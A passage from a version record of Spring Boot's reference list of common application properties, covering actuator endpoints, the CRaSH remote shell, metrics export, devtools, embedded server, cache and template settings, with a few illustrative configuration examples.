Login user to authenticate to the broker.\n\tspring.rabbitmq.virtual-host= # Virtual host to use when connecting to the broker.\n\n\n\t# ----------------------------------------\n\t# ACTUATOR PROPERTIES\n\t# ----------------------------------------\n\n\t# ENDPOINTS ({sc-spring-boot-actuator}\/endpoint\/AbstractEndpoint.{sc-ext}[AbstractEndpoint] subclasses)\n\tendpoints.enabled=true # Enable endpoints.\n\tendpoints.sensitive= # Default endpoint sensitive setting.\n\tendpoints.actuator.enabled=true # Enable the endpoint.\n\tendpoints.actuator.path= # Endpoint URL path.\n\tendpoints.actuator.sensitive=false # Enable security on the endpoint.\n\tendpoints.autoconfig.enabled= # Enable the endpoint.\n\tendpoints.autoconfig.id= # Endpoint identifier.\n\tendpoints.autoconfig.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.beans.enabled= # Enable the endpoint.\n\tendpoints.beans.id= # Endpoint identifier.\n\tendpoints.beans.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.configprops.enabled= # Enable the endpoint.\n\tendpoints.configprops.id= # Endpoint identifier.\n\tendpoints.configprops.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized.
Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.configprops.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.docs.curies.enabled=false # Enable the curie generation.\n\tendpoints.docs.enabled=true # Enable actuator docs endpoint.\n\tendpoints.docs.path=\/docs #\n\tendpoints.docs.sensitive=false #\n\tendpoints.dump.enabled= # Enable the endpoint.\n\tendpoints.dump.id= # Endpoint identifier.\n\tendpoints.dump.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.env.enabled= # Enable the endpoint.\n\tendpoints.env.id= # Endpoint identifier.\n\tendpoints.env.keys-to-sanitize=password,secret,key,.*credentials.*,vcap_services # Keys that should be sanitized. Keys can be simple strings that the property ends with or regex expressions.\n\tendpoints.env.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.flyway.enabled= # Enable the endpoint.\n\tendpoints.flyway.id= # Endpoint identifier.\n\tendpoints.flyway.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.enabled= # Enable the endpoint.\n\tendpoints.health.id= # Endpoint identifier.\n\tendpoints.health.mapping.*= # Mapping of health statuses to HttpStatus codes. By default, registered health statuses map to sensible defaults (i.e. UP maps to 200).\n\tendpoints.health.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.health.time-to-live=1000 # Time to live for cached result, in milliseconds.\n\tendpoints.info.enabled= # Enable the endpoint.\n\tendpoints.info.id= # Endpoint identifier.\n\tendpoints.info.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.jolokia.enabled=true # Enable Jolokia endpoint.\n\tendpoints.jolokia.path=\/jolokia # Endpoint URL path.\n\tendpoints.jolokia.sensitive=true # Enable security on the endpoint.\n\tendpoints.liquibase.enabled= # Enable the endpoint.\n\tendpoints.liquibase.id= # Endpoint identifier.\n\tendpoints.liquibase.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.logfile.enabled=true # Enable the endpoint.\n\tendpoints.logfile.path=\/logfile # Endpoint URL path.\n\tendpoints.logfile.sensitive=true # Enable security on the endpoint.\n\tendpoints.mappings.enabled= # Enable the endpoint.\n\tendpoints.mappings.id= # Endpoint identifier.\n\tendpoints.mappings.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.metrics.enabled= # Enable the endpoint.\n\tendpoints.metrics.filter.enabled=true # Enable the metrics servlet filter.\n\tendpoints.metrics.id= # Endpoint identifier.\n\tendpoints.metrics.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.shutdown.enabled= # Enable the endpoint.\n\tendpoints.shutdown.id= # Endpoint identifier.\n\tendpoints.shutdown.sensitive= # Mark if the endpoint exposes sensitive information.\n\tendpoints.trace.enabled= # Enable the endpoint.\n\tendpoints.trace.id= # Endpoint identifier.\n\tendpoints.trace.sensitive= # Mark if the endpoint exposes sensitive information.\n\n\t# ENDPOINTS CORS CONFIGURATION ({sc-spring-boot-actuator}\/autoconfigure\/EndpointCorsProperties.{sc-ext}[EndpointCorsProperties])\n\tendpoints.cors.allow-credentials= # Set whether credentials are supported. When not set, credentials are not supported.\n\tendpoints.cors.allowed-headers= # Comma-separated list of headers to allow in a request. 
\n\tendpoints.cors.allowed-methods=GET # Comma-separated list of methods to allow. '*' allows all methods.\n\tendpoints.cors.allowed-origins= # Comma-separated list of origins to allow. '*' allows all origins. When not set, CORS support is disabled.\n\tendpoints.cors.exposed-headers= # Comma-separated list of headers to include in a response.\n\tendpoints.cors.max-age=1800 # How long, in seconds, the response from a pre-flight request can be cached by clients.\n\n\t# JMX ENDPOINT ({sc-spring-boot-actuator}\/autoconfigure\/EndpointMBeanExportProperties.{sc-ext}[EndpointMBeanExportProperties])\n\tendpoints.jmx.domain= # JMX domain name. Initialized with the value of 'spring.jmx.default-domain' if set.\n\tendpoints.jmx.enabled=true # Enable JMX export of all endpoints.\n\tendpoints.jmx.static-names= # Additional static properties to append to all ObjectNames of MBeans representing Endpoints.\n\tendpoints.jmx.unique-names=false # Ensure that ObjectNames are modified in case of conflict.\n\n\t# JOLOKIA ({sc-spring-boot-actuator}\/autoconfigure\/JolokiaProperties.{sc-ext}[JolokiaProperties])\n\tjolokia.config.*= # See Jolokia manual\n\n\t# MANAGEMENT HTTP SERVER ({sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[ManagementServerProperties])\n\tmanagement.add-application-context-header=true # Add the \"X-Application-Context\" HTTP header in each response.\n\tmanagement.address= # Network address that the management endpoints should bind to.\n\tmanagement.context-path= # Management endpoint context-path. For instance `\/actuator`\n\tmanagement.port= # Management endpoint HTTP port. Use the same port as the application by default.\n\tmanagement.security.enabled=true # Enable security.\n\tmanagement.security.role=ADMIN # Role required to access the management endpoint.\n\tmanagement.security.sessions=stateless # Session creation policy to use (always, never, if_required, stateless).\n\n\t# HEALTH INDICATORS (previously health.*)\n\tmanagement.health.db.enabled=true # Enable database health check.\n\tmanagement.health.defaults.enabled=true # Enable default health indicators.\n\tmanagement.health.diskspace.enabled=true # Enable disk space health check.\n\tmanagement.health.diskspace.path= # Path used to compute the available disk space.\n\tmanagement.health.diskspace.threshold=0 # Minimum disk space that should be available, in bytes.\n\tmanagement.health.elasticsearch.enabled=true # Enable elasticsearch health check.\n\tmanagement.health.elasticsearch.indices= # Comma-separated index names.\n\tmanagement.health.elasticsearch.response-timeout=100 # The time, in milliseconds, to wait for a response from the cluster.\n\tmanagement.health.jms.enabled=true # Enable JMS health check.\n\tmanagement.health.mail.enabled=true # Enable Mail health check.\n\tmanagement.health.mongo.enabled=true # Enable MongoDB health check.\n\tmanagement.health.rabbit.enabled=true # Enable RabbitMQ health check.\n\tmanagement.health.redis.enabled=true # Enable Redis health check.\n\tmanagement.health.solr.enabled=true # Enable Solr health check.\n\tmanagement.health.status.order=DOWN, OUT_OF_SERVICE, UNKNOWN, UP # Comma-separated list of health statuses in order of severity.\n\n\t# TRACING ({sc-spring-boot-actuator}\/trace\/TraceProperties.{sc-ext}[TraceProperties])\n\tmanagement.trace.include=request-headers,response-headers,errors # Items to be included in the trace.\n\n\t# REMOTE SHELL\n\tshell.auth=simple # Authentication type.
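Auto-detected according to the environment.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical CRaSH shell setup: SSH on a non-default port, authenticated via\n\t# Spring Security; the port and role are placeholder values.\n\tshell.auth=spring\n\tshell.auth.spring.roles=ADMIN\n\tshell.ssh.enabled=true\n\tshell.ssh.port=2222\n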
\n\tshell.auth.jaas.domain=my-domain # JAAS domain.\n\tshell.auth.key.path= # Path to the authentication key. This should point to a valid \".pem\" file.\n\tshell.auth.simple.user.name=user # Login user.\n\tshell.auth.simple.user.password= # Login password.\n\tshell.auth.spring.roles=ADMIN # Comma-separated list of required roles to log in to the CRaSH console.\n\tshell.command-path-patterns=classpath*:\/commands\/**,classpath*:\/crash\/commands\/** # Patterns to use to look for commands.\n\tshell.command-refresh-interval=-1 # Scan for changes and update the command if necessary (in seconds).\n\tshell.config-path-patterns=classpath*:\/crash\/* # Patterns to use to look for configurations.\n\tshell.disabled-commands=jpa*,jdbc*,jndi* # Comma-separated list of commands to disable.\n\tshell.disabled-plugins= # Comma-separated list of plugins to disable. Certain plugins are disabled by default based on the environment.\n\tshell.ssh.auth-timeout= # Number of milliseconds after which the user will be prompted to log in again.\n\tshell.ssh.enabled=true # Enable CRaSH SSH support.\n\tshell.ssh.idle-timeout= # Number of milliseconds after which unused connections are closed.\n\tshell.ssh.key-path= # Path to the SSH server key.\n\tshell.ssh.port=2000 # SSH port.\n\tshell.telnet.enabled=false # Enable CRaSH telnet support. Enabled by default if the TelnetPlugin is available.\n\tshell.telnet.port=5000 # Telnet port.\n\n\t# GIT INFO\n\tspring.git.properties= # Resource reference to a generated git info properties file.\n\n\t# METRICS EXPORT ({sc-spring-boot-actuator}\/metrics\/export\/MetricExportProperties.{sc-ext}[MetricExportProperties])\n\tspring.metrics.export.aggregate.key-pattern= # Pattern that tells the aggregator what to do with the keys from the source repository.\n\tspring.metrics.export.aggregate.prefix= # Prefix for global repository if active.\n\tspring.metrics.export.delay-millis=5000 # Delay in milliseconds between export ticks. Metrics are exported to external sources on a schedule with this delay.\n\tspring.metrics.export.enabled=true # Flag to enable metric export (assuming a MetricWriter is available).\n\tspring.metrics.export.excludes= # List of patterns for metric names to exclude.
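Applied after the includes.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical statsd export: ship metrics every 5 seconds to a placeholder host.\n\tspring.metrics.export.enabled=true\n\tspring.metrics.export.delay-millis=5000\n\tspring.metrics.export.statsd.host=statsd.example.com\n\tspring.metrics.export.statsd.port=8125\n\tspring.metrics.export.statsd.prefix=myapp\n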
\n\tspring.metrics.export.includes= # List of patterns for metric names to include.\n\tspring.metrics.export.redis.key=keys.spring.metrics # Key for redis repository export (if active).\n\tspring.metrics.export.redis.prefix=spring.metrics # Prefix for redis repository if active.\n\tspring.metrics.export.send-latest= # Flag to switch off any available optimizations based on not exporting unchanged metric values.\n\tspring.metrics.export.statsd.host= # Host of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.port=8125 # Port of a statsd server to receive exported metrics.\n\tspring.metrics.export.statsd.prefix= # Prefix for statsd exported metrics.\n\tspring.metrics.export.triggers.*= # Specific trigger properties per MetricWriter bean name.\n\n\n\t# ----------------------------------------\n\t# DEVTOOLS PROPERTIES\n\t# ----------------------------------------\n\n\t# DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/DevToolsProperties.{sc-ext}[DevToolsProperties])\n\tspring.devtools.livereload.enabled=true # Enable a livereload.com compatible server.\n\tspring.devtools.livereload.port=35729 # Server port.\n\tspring.devtools.restart.additional-exclude= # Additional patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.additional-paths= # Additional paths to watch for changes.\n\tspring.devtools.restart.enabled=true # Enable automatic restart.\n\tspring.devtools.restart.exclude=META-INF\/maven\/**,META-INF\/resources\/**,resources\/**,static\/**,public\/**,templates\/**,**\/*Test.class,**\/*Tests.class,git.properties # Patterns that should be excluded from triggering a full restart.\n\tspring.devtools.restart.poll-interval=1000 # Amount of time (in milliseconds) to wait between polling for classpath changes.\n\tspring.devtools.restart.quiet-period=400 # Amount of quiet time (in milliseconds) required without any classpath changes before a restart is triggered.\n\tspring.devtools.restart.trigger-file= # Name of a specific file that when changed will trigger the restart check. If not specified, any classpath file change will trigger the restart.\n\n\t# REMOTE DEVTOOLS ({sc-spring-boot-devtools}\/autoconfigure\/RemoteDevToolsProperties.{sc-ext}[RemoteDevToolsProperties])\n\tspring.devtools.remote.context-path=\/.~~spring-boot!~ # Context path used to handle the remote connection.\n\tspring.devtools.remote.debug.enabled=true # Enable remote debug support.\n\tspring.devtools.remote.debug.local-port=8000 # Local remote debug server port.\n\tspring.devtools.remote.proxy.host= # The host of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.proxy.port= # The port of the proxy to use to connect to the remote application.\n\tspring.devtools.remote.restart.enabled=true # Enable remote restart.\n\tspring.devtools.remote.secret= # A shared secret required to establish a connection (required to enable remote support).\n\tspring.devtools.remote.secret-header-name=X-AUTH-TOKEN # HTTP header used to transfer the shared secret.\n\n----\n","old_contents":":numbered!:\n[appendix]\n[[common-application-properties]]\n== Common application properties\nVarious properties can be specified inside your `application.properties`\/`application.yml`\nfile or as command line switches.
This section provides a list of common Spring Boot\nproperties and references to the underlying classes that consume them.\n\nNOTE: Property contributions can come from additional jar files on your classpath so\nyou should not consider this an exhaustive list. It is also perfectly legit to define\nyour own properties.\n\nWARNING: This sample file is meant as a guide only. Do **not** copy\/paste the entire\ncontent into your application; rather pick only the properties that you need.\n\n\n[source,properties,indent=0,subs=\"verbatim,attributes,macros\"]\n----\n\t# ===================================================================\n\t# COMMON SPRING BOOT PROPERTIES\n\t#\n\t# This sample file is provided as a guideline. Do NOT copy it in its\n\t# entirety to your own application.\n\t# ===================================================================\n\n\n\t# ----------------------------------------\n\t# CORE PROPERTIES\n\t# ----------------------------------------\n\n\t# BANNER\n\tbanner.charset=UTF-8 # Banner file encoding.\n\tbanner.location=classpath:banner.txt # Banner file location.\n\n\t# LOGGING\n\tlogging.config= # Location of the logging configuration file. For instance `classpath:logback.xml` for Logback\n\tlogging.exception-conversion-word=%wEx # Conversion word used when logging exceptions.\n\tlogging.file= # Log file name. For instance `myapp.log`\n\tlogging.level.*= # Log levels severity mapping. For instance `logging.level.org.springframework=DEBUG`\n\tlogging.path= # Location of the log file. For instance `\/var\/log`\n\tlogging.pattern.console= # Appender pattern for output to the console. Only supported with the default logback setup.\n\tlogging.pattern.file= # Appender pattern for output to the file. Only supported with the default logback setup.\n\tlogging.pattern.level= # Appender pattern for log level (default %5p). Only supported with the default logback setup.\n\tlogging.register-shutdown-hook=false # Register a shutdown hook for the logging system when it is initialized.\n\n\t# AOP\n\tspring.aop.auto=true # Add @EnableAspectJAutoProxy.\n\tspring.aop.proxy-target-class=false # Whether subclass-based (CGLIB) proxies are to be created (true) as opposed to standard Java interface-based proxies (false).\n\n\t# IDENTITY ({sc-spring-boot}\/context\/ContextIdApplicationContextInitializer.{sc-ext}[ContextIdApplicationContextInitializer])\n\tspring.application.index= # Application index.\n\tspring.application.name= # Application name.\n\n\t# ADMIN ({sc-spring-boot-autoconfigure}\/admin\/SpringApplicationAdminJmxAutoConfiguration.{sc-ext}[SpringApplicationAdminJmxAutoConfiguration])\n\tspring.application.admin.enabled=false # Enable admin features for the application.\n\tspring.application.admin.jmx-name=org.springframework.boot:type=Admin,name=SpringApplication # JMX name of the application admin MBean.\n\n\t# AUTO-CONFIGURATION\n\tspring.autoconfigure.exclude= # Auto-configuration classes to exclude.\n\n\t# SPRING CORE\n\tspring.beaninfo.ignore=true # Skip search of BeanInfo classes.\n\n\t# SPRING CACHE ({sc-spring-boot-autoconfigure}\/cache\/CacheProperties.{sc-ext}[CacheProperties])\n\tspring.cache.cache-names= # Comma-separated list of cache names to create if supported by the underlying cache manager.\n\tspring.cache.ehcache.config= # The location of the configuration file to use to initialize EhCache.\n\tspring.cache.guava.spec= # The spec to use to create caches.
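Check CacheBuilderSpec for more details on the spec format.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical Guava cache setup: two named caches with a placeholder spec.\n\tspring.cache.type=guava\n\tspring.cache.cache-names=users,orders\n\tspring.cache.guava.spec=maximumSize=500,expireAfterAccess=600s\n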
\n\tspring.cache.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\tspring.cache.infinispan.config= # The location of the configuration file to use to initialize Infinispan.\n\tspring.cache.jcache.config= # The location of the configuration file to use to initialize the cache manager.\n\tspring.cache.jcache.provider= # Fully qualified name of the CachingProvider implementation to use to retrieve the JSR-107 compliant cache manager. Only needed if more than one JSR-107 implementation is available on the classpath.\n\tspring.cache.type= # Cache type, auto-detected according to the environment by default.\n\n\t# SPRING CONFIG - using environment property only ({sc-spring-boot}\/context\/config\/ConfigFileApplicationListener.{sc-ext}[ConfigFileApplicationListener])\n\tspring.config.location= # Config file locations.\n\tspring.config.name=application # Config file name.\n\n\t# HAZELCAST ({sc-spring-boot-autoconfigure}\/hazelcast\/HazelcastProperties.{sc-ext}[HazelcastProperties])\n\tspring.hazelcast.config= # The location of the configuration file to use to initialize Hazelcast.\n\n\t# JMX\n\tspring.jmx.default-domain= # JMX domain name.\n\tspring.jmx.enabled=true # Expose management beans to the JMX domain.\n\tspring.jmx.server=mbeanServer # MBeanServer bean name.\n\n\t# Email ({sc-spring-boot-autoconfigure}\/mail\/MailProperties.{sc-ext}[MailProperties])\n\tspring.mail.default-encoding=UTF-8 # Default MimeMessage encoding.\n\tspring.mail.host= # SMTP server host. For instance `smtp.example.com`\n\tspring.mail.jndi-name= # Session JNDI name. When set, takes precedence over other mail settings.\n\tspring.mail.password= # Login password of the SMTP server.\n\tspring.mail.port= # SMTP server port.\n\tspring.mail.properties.*= # Additional JavaMail session properties.\n\tspring.mail.protocol=smtp # Protocol used by the SMTP server.\n\tspring.mail.test-connection=false # Test that the mail server is available on startup.\n\tspring.mail.username= # Login user of the SMTP server.\n\n\t# APPLICATION SETTINGS ({sc-spring-boot}\/SpringApplication.{sc-ext}[SpringApplication])\n\tspring.main.banner-mode=console # Mode used to display the banner when the application runs.\n\tspring.main.sources= # Sources (class name, package name or XML resource location) to include in the ApplicationContext.\n\tspring.main.web-environment= # Run the application in a web environment (auto-detected by default).\n\n\t# FILE ENCODING ({sc-spring-boot}\/context\/FileEncodingApplicationListener.{sc-ext}[FileEncodingApplicationListener])\n\tspring.mandatory-file-encoding= # Expected character encoding the application must use.\n\n\t# INTERNATIONALIZATION ({sc-spring-boot-autoconfigure}\/MessageSourceAutoConfiguration.{sc-ext}[MessageSourceAutoConfiguration])\n\tspring.messages.basename=messages # Comma-separated list of basenames, each following the ResourceBundle convention.\n\tspring.messages.cache-seconds=-1 # Loaded resource bundle files cache expiration, in seconds.
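When set to -1, bundles are cached forever.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical i18n setup: two bundle basenames, cached for one hour.\n\tspring.messages.basename=messages,config.i18n.messages\n\tspring.messages.cache-seconds=3600\n\tspring.messages.encoding=UTF-8\n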
\n\tspring.messages.encoding=UTF-8 # Message bundles encoding.\n\tspring.messages.fallback-to-system-locale=true # Set whether to fall back to the system Locale if no files for a specific Locale have been found.\n\n\t# OUTPUT\n\tspring.output.ansi.enabled=detect # Configure the ANSI output (can be \"detect\", \"always\", \"never\").\n\n\t# PID FILE ({sc-spring-boot-actuator}\/system\/ApplicationPidFileWriter.{sc-ext}[ApplicationPidFileWriter])\n\tspring.pid.fail-on-write-error= # Fail if ApplicationPidFileWriter is used but it cannot write the PID file.\n\tspring.pid.file= # Location of the PID file to write (if ApplicationPidFileWriter is used).\n\n\t# PROFILES\n\tspring.profiles.active= # Comma-separated list of <<howto-set-active-spring-profiles,active profiles>>.\n\tspring.profiles.include= # Unconditionally activate the specified comma-separated profiles.\n\n\t# SENDGRID ({sc-spring-boot-autoconfigure}\/sendgrid\/SendGridAutoConfiguration.{sc-ext}[SendGridAutoConfiguration])\n\tspring.sendgrid.api-key= # SendGrid API key (alternative to username\/password)\n\tspring.sendgrid.username= # SendGrid account username\n\tspring.sendgrid.password= # SendGrid account password\n\tspring.sendgrid.proxy.host= # SendGrid proxy host\n\tspring.sendgrid.proxy.port= # SendGrid proxy port\n\n\n\t# ----------------------------------------\n\t# WEB PROPERTIES\n\t# ----------------------------------------\n\n\t# MULTIPART ({sc-spring-boot-autoconfigure}\/web\/MultipartProperties.{sc-ext}[MultipartProperties])\n\tmultipart.enabled=true # Enable support of multi-part uploads.\n\tmultipart.file-size-threshold=0 # Threshold after which files will be written to disk. Values can use the suffixes \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\tmultipart.location= # Intermediate location of uploaded files.\n\tmultipart.max-file-size=1Mb # Max file size. Values can use the suffixes \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\tmultipart.max-request-size=10Mb # Max request size. Values can use the suffixes \"MB\" or \"KB\" to indicate a Megabyte or Kilobyte size.\n\n\t# EMBEDDED SERVER CONFIGURATION ({sc-spring-boot-autoconfigure}\/web\/ServerProperties.{sc-ext}[ServerProperties])\n\tserver.address= # Network address to which the server should bind.\n\tserver.compression.enabled=false # If response compression is enabled.\n\tserver.compression.excluded-user-agents= # List of user-agents to exclude from compression.\n\tserver.compression.mime-types= # Comma-separated list of MIME types that should be compressed. For instance `text\/html,text\/css,application\/json`\n\tserver.compression.min-response-size= # Minimum response size that is required for compression to be performed. For instance 2048\n\tserver.context-parameters.*= # Servlet context init parameters.
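For instance `server.context-parameters.a=alpha`\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical embedded-server setup: custom port, context path and gzip compression.\n\tserver.port=8090\n\tserver.context-path=\/myapp\n\tserver.compression.enabled=true\n\tserver.compression.mime-types=text\/html,text\/css,application\/json\n\tserver.compression.min-response-size=2048\n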
\n\tserver.context-path= # Context path of the application.\n\tserver.display-name=application # Display name of the application.\n\tserver.error.include-stacktrace=never # When to include a \"stacktrace\" attribute.\n\tserver.error.path=\/error # Path of the error controller.\n\tserver.error.whitelabel.enabled=true # Enable the default error page displayed in browsers in case of a server error.\n\tserver.jsp-servlet.class-name=org.apache.jasper.servlet.JspServlet # The class name of the JSP servlet.\n\tserver.jsp-servlet.init-parameters.*= # Init parameters used to configure the JSP servlet.\n\tserver.jsp-servlet.registered=true # Whether or not the JSP servlet is registered.\n\tserver.port=8080 # Server HTTP port.\n\tserver.server-header= # The value sent in the server response header (uses servlet container default if empty).\n\tserver.servlet-path=\/ # Path of the main dispatcher servlet.\n\tserver.session.cookie.comment= # Comment for the session cookie.\n\tserver.session.cookie.domain= # Domain for the session cookie.\n\tserver.session.cookie.http-only= # \"HttpOnly\" flag for the session cookie.\n\tserver.session.cookie.max-age= # Maximum age of the session cookie in seconds.\n\tserver.session.cookie.name= # Session cookie name.\n\tserver.session.cookie.path= # Path of the session cookie.\n\tserver.session.cookie.secure= # \"Secure\" flag for the session cookie.\n\tserver.session.persistent=false # Persist session data between restarts.\n\tserver.session.store-dir= # Directory used to store session data.\n\tserver.session.timeout= # Session timeout in seconds.\n\tserver.session.tracking-modes= # Session tracking modes (one or more of the following: \"cookie\", \"url\", \"ssl\").\n\tserver.ssl.ciphers= # Supported SSL ciphers.\n\tserver.ssl.client-auth= # Whether client authentication is wanted (\"want\") or needed (\"need\"). Requires a trust store.\n\tserver.ssl.enabled= # Enable SSL support.\n\tserver.ssl.key-alias= # Alias that identifies the key in the key store.\n\tserver.ssl.key-password= # Password used to access the key in the key store.\n\tserver.ssl.key-store= # Path to the key store that holds the SSL certificate.\n\tserver.ssl.key-store-password= # Password used to access the key store.\n\tserver.ssl.key-store-provider= # Provider for the key store.\n\tserver.ssl.key-store-type= # Type of the key store.\n\tserver.ssl.protocol= # SSL protocol to use.\n\tserver.ssl.trust-store= # Trust store that holds SSL certificates.\n\tserver.ssl.trust-store-password= # Password used to access the trust store.\n\tserver.ssl.trust-store-provider= # Provider for the trust store.\n\tserver.ssl.trust-store-type= # Type of the trust store.\n\tserver.tomcat.accesslog.directory=logs # Directory in which log files are created. Can be relative to the tomcat base dir or absolute.\n\tserver.tomcat.accesslog.enabled=false # Enable access log.\n\tserver.tomcat.accesslog.pattern=common # Format pattern for access logs.\n\tserver.tomcat.accesslog.prefix=access_log # Log file name prefix.\n\tserver.tomcat.accesslog.suffix=.log # Log file name suffix.\n\tserver.tomcat.background-processor-delay=30 # Delay in seconds between the invocation of backgroundProcess methods.\n\tserver.tomcat.basedir= # Tomcat base directory.
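If not specified, a temporary directory will be used.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical setup for Tomcat behind a TLS-terminating reverse proxy; the\n\t# header names mirror the conventional X-Forwarded-* family.\n\tserver.use-forward-headers=true\n\tserver.tomcat.remote-ip-header=X-Forwarded-For\n\tserver.tomcat.protocol-header=X-Forwarded-Proto\n\tserver.tomcat.protocol-header-https-value=https\n\tserver.tomcat.port-header=X-Forwarded-Port\n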
\n\tserver.tomcat.internal-proxies=10\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t192\\\\.168\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t169\\\\.254\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t127\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.1[6-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.2[0-9]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3}|\\\\\n\t\t\t172\\\\.3[0-1]{1}\\\\.\\\\d{1,3}\\\\.\\\\d{1,3} # Regular expression matching trusted IP addresses.\n\tserver.tomcat.max-http-header-size=0 # Maximum size in bytes of the HTTP message header.\n\tserver.tomcat.max-threads=0 # Maximum number of worker threads.\n\tserver.tomcat.port-header=X-Forwarded-Port # Name of the HTTP header used to override the original port value.\n\tserver.tomcat.protocol-header= # Header that holds the incoming protocol, usually named \"X-Forwarded-Proto\".\n\tserver.tomcat.protocol-header-https-value=https # Value of the protocol header that indicates that the incoming request uses SSL.\n\tserver.tomcat.remote-ip-header= # Name of the HTTP header from which the remote IP is extracted. For instance `X-FORWARDED-FOR`\n\tserver.tomcat.uri-encoding=UTF-8 # Character encoding to use to decode the URI.\n\tserver.undertow.accesslog.dir= # Undertow access log directory.\n\tserver.undertow.accesslog.enabled=false # Enable access log.\n\tserver.undertow.accesslog.pattern=common # Format pattern for access logs.\n\tserver.undertow.buffer-size= # Size of each buffer in bytes.\n\tserver.undertow.buffers-per-region= # Number of buffers per region.\n\tserver.undertow.direct-buffers= # Allocate buffers outside the Java heap.\n\tserver.undertow.io-threads= # Number of I\/O threads to create for the worker.\n\tserver.undertow.worker-threads= # Number of worker threads.\n\tserver.use-forward-headers= # If X-Forwarded-* headers should be applied to the HttpRequest.\n\n\t# FREEMARKER ({sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[FreeMarkerAutoConfiguration])\n\tspring.freemarker.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.freemarker.cache=false # Enable template caching.\n\tspring.freemarker.charset=UTF-8 # Template encoding.\n\tspring.freemarker.check-template-location=true # Check that the templates location exists.\n\tspring.freemarker.content-type=text\/html # Content-Type value.\n\tspring.freemarker.enabled=true # Enable MVC view resolution for this technology.\n\tspring.freemarker.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.freemarker.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.freemarker.prefer-file-system-access=true # Prefer file system access for template loading.
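File system access enables hot detection of template changes.\n\n\t# ---- EXAMPLE (illustrative only) ----\n\t# A hypothetical development setup: disable template caching so edits show up\n\t# immediately; the file: path is a placeholder for a local working copy.\n\tspring.freemarker.cache=false\n\tspring.freemarker.prefer-file-system-access=true\n\tspring.freemarker.template-loader-path=file:src\/main\/resources\/templates\/\n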
\n\tspring.freemarker.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.freemarker.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.freemarker.settings.*= # Well-known FreeMarker keys which will be passed to FreeMarker's Configuration.\n\tspring.freemarker.suffix= # Suffix that gets appended to view names when building a URL.\n\tspring.freemarker.template-loader-path=classpath:\/templates\/ # Comma-separated list of template paths.\n\tspring.freemarker.view-names= # White list of view names that can be resolved.\n\n\t# GROOVY TEMPLATES ({sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[GroovyTemplateAutoConfiguration])\n\tspring.groovy.template.allow-request-override=false # Set whether HttpServletRequest attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.allow-session-override=false # Set whether HttpSession attributes are allowed to override (hide) controller generated model attributes of the same name.\n\tspring.groovy.template.cache= # Enable template caching.\n\tspring.groovy.template.charset=UTF-8 # Template encoding.\n\tspring.groovy.template.check-template-location=true # Check that the templates location exists.\n\tspring.groovy.template.configuration.*= # See GroovyMarkupConfigurer\n\tspring.groovy.template.content-type=text\/html # Content-Type value.\n\tspring.groovy.template.enabled=true # Enable MVC view resolution for this technology.\n\tspring.groovy.template.expose-request-attributes=false # Set whether all request attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-session-attributes=false # Set whether all HttpSession attributes should be added to the model prior to merging with the template.\n\tspring.groovy.template.expose-spring-macro-helpers=true # Set whether to expose a RequestContext for use by Spring's macro library, under the name \"springMacroRequestContext\".\n\tspring.groovy.template.prefix= # Prefix that gets prepended to view names when building a URL.\n\tspring.groovy.template.request-context-attribute= # Name of the RequestContext attribute for all views.\n\tspring.groovy.template.resource-loader-path=classpath:\/templates\/ # Template path.\n\tspring.groovy.template.suffix=.tpl # Suffix that gets appended to view names when building a URL.\n\tspring.groovy.template.view-names= # White list of view names that can be resolved.\n\n\t# SPRING HATEOAS 